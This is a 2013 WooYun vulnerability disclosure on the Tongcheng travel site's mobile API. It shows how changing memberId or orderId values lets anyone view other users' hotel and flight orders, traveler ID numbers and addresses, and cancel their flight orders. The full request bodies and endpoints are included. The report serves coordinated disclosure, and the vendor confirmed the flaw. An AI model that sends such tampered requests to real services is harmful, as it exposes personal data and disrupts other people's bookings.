当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-017921

漏洞标题:【同程网】任意酒店\机票\登机人\常用地址信息未授权查看

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者: O.o

提交时间:2013-01-26 14:51

修复时间:2013-03-12 14:51

公开时间:2013-03-12 14:51

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-26: 细节已通知厂商并且等待厂商处理中
2013-01-27: 厂商已经确认,细节仅向厂商公开
2013-02-06: 细节向核心白帽子及相关领域专家公开
2013-02-16: 细节向普通白帽子公开
2013-02-26: 细节向实习白帽子公开
2013-03-12: 细节向公众公开

简要描述:

随手丢出来看到了,另外,伪冒我刚刚399的机票付款的时候一直提示我价格更改成869,回去查查还是显示399.好内涵~

详细说明:


酒店订单:
1、任意用户订单列表
http://mobileapi.17usoft.com/tcmiddleapi/hotel/orderhandler.ashx
传参
{"request":{"body":{"pageSize":"50","memberId":"17145645","clientInfo":{"deviceId":"486874946330901","versionNumber":"4.6.0","versionType":"android"},"page":"1","timeSpanType":"1"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","deviceId":"486874946330901","digitalSign":"55f1275b7020365b979a0538875a6c91","refId":"5866720","reqTime":"2013-01-25 22:44:52.854","serviceName":"GetOrderList","version":"20111128102912"}}}
通过改变用户ID变量:memberId":"17025644",
查询到订单编号字段:orderSerialId":"130125009132",
[图]获取ID下酒店订单

ID下酒店订单号.png


2、任意订单详情
http://mobileapi.17usoft.com/tcmiddleapi/hotel/orderhandler.ashx
post传参
{"request":{"body":{"clientInfo":{"deviceId":"486874946330901","versionNumber":"4.6.0","versionType":"android"},"orderSerialId":"130125005000"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","deviceId":"486874946330901","digitalSign":"5052db223223a1b9caa0cb30ead4450c","refId":"5866720","reqTime":"2013-01-25 22:44:54.484","serviceName":"GetOrderDetail","version":"20111128102912"}}}
通过更改订单号变量
orderSerialId":"130125005000"
查询订单详情
[图]获取酒店订单详情

.png


机票订单
1、任意用户订单列表
http://tcmobileapi.17usoft.com/MobileAPI/flight/orderhandler.ashx
{"request":{"body":{"clientInfo":{"deviceId":"486874946330901","versionNumber":"4.6.0","versionType":"android"},"memberId":"17145335"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","deviceId":"486874946330901","digitalSign":"40c276658239c7a6012292cdc46b79fb","refId":"5866720","reqTime":"2013-01-25 23:16:45.164","serviceName":"GetFlightOrderList","version":"20111128102912"}}}
通过更改用户ID变量"memberId":"17145335"
获取到订单列表信息及用户下订单编号orderNo":"43828198"
[图]获取ID下机票订单号

ID下机票订单号.png


2、任意订单详情,与menberID一起查询订单
http://tcmobileapi.17usoft.com/MobileAPI/flight/orderhandler.ashx
{"request":{"body":{"clientInfo":{"deviceId":"486874946330901","versionNumber":"4.6.0","versionType":"android"},"memberId":"17145335","orderId":"43828198"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","deviceId":"486874946330901","digitalSign":"47d608c04c39bcf8ae098eca0c51131a","refId":"5866720","reqTime":"2013-01-25 23:16:36.384","serviceName":"GetFlightOrderdetail","version":"20111128102912"}}}
这里的"memberId":"17145622","orderId":"43827455"需要通过1、任意用户订单列表中获取并对应,否则显示信息为未定义.
[图]获取机票订单详情1

1.png


[图]获取机票订单详情2

2.png


3、获取常用旅客信息(包括身份证号)
http://tcmobileapi.17usoft.com/MobileAPI/general/contactHandler.ashx
{"request":{"body":{"clientInfo":{"deviceId":"486874946330901","versionNumber":"4.6.0","versionType":"android"},"memberId":"17145542"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","deviceId":"486874946330901","digitalSign":"1efefd983244229fa185ffd07eb03fbf","refId":"5866720","reqTime":"2013-01-25 23:07:01.444","serviceName":"GetContactList","version":"20111128102912"}}}
[图]获取登机人信息

.png


4、机票取消
http://tcmobileapi.17usoft.com/MobileAPI/flight/orderhandler.ashx
{"request":{"body":{"memberId":"17145645","memberName":"181ytghw888","clientInfo":{"deviceId":"486874946330901","versionNumber":"4.6.0","versionType":"android"},"cancelReason":"4","orderId":"43830981"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","deviceId":"486874946330901","digitalSign":"2384b1bf7507eed18f2259fe0155a6c1","refId":"5866720","reqTime":"2013-01-25 23:27:25.634","serviceName":"CancelFlightOrder","version":"20111128102912"}}}
这里的"memberId":"17145622","orderId":"43827455"需要通过1、任意用户订单列表中获取并对应
第一次取消的时候没截图.又不能去取消其他人的机票,所以补上一个信用卡禁止取消的来验证.
取消成功返回
{"response":{"header":{"rspType":"0","rspCode":"0000","rspDesc":"取消订单成功"},"body":""}}
[图]取消机票订单

.png


常用地址查询
http://tcmobileapi.17usoft.com/MobileAPI/General/ReciverHandler.ashx
{"request":{"body":{"clientInfo":{"deviceId":"486874946330901","versionNumber":"4.6.0","versionType":"android"},"memberId":"17145645"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","deviceId":"486874946330901","digitalSign":"e4c06c6a3573a4d935ee58f9295eaa2a","refId":"5866720","reqTime":"2013-01-25 23:36:13.874","serviceName":"QueryReciver","version":"20111128102912"}}}
[图]常用地址查询

.png

漏洞证明:

修复方案:

接口验证,另外还有酒店订单取消等其他接口不一一列举了。现在只要用户ID和订单ID符合就可以操作所有订单。

版权声明:转载请注明来源 O.o@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:19

确认时间:2013-01-27 20:00

厂商回复:

非常严重,非常感谢,我们尽快排查和修复

最新状态:

暂无


漏洞评价:

评论

  1. 2013-01-26 14:55 | O.o ( 普通白帽子 | Rank:105 漏洞数:12 | ส็็็็็็็็็็็็็็็็็็็...)

    -机场MM:先森您好,您的机票不存在哦~您不能换登机牌哦~-XSSER:不会吖,我明明在同程网订票的哦~-机场MM:先森,您的订单已经被取消了呢~-XSSER:我勒个去!

  2. 2013-01-26 15:31 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    这个报了好多次了

  3. 2013-01-26 16:09 | O.o ( 普通白帽子 | Rank:105 漏洞数:12 | ส็็็็็็็็็็็็็็็็็็็...)

    @xsser 接口一样的话帮忙删了~谢谢~

  4. 2013-01-28 09:23 | 顺子 ( 普通白帽子 | Rank:236 漏洞数:36 | 0-0努力像正常青年靠近,再也不当上错图的2...)

    -机场MM:先森您好,您的机票不存在哦~您不能换登机牌哦~ -XSSER:不会吖,我明明在同程网订票的哦~ -机场MM:先森,您的订单已经被取消了呢~ -XSSER:我勒个去!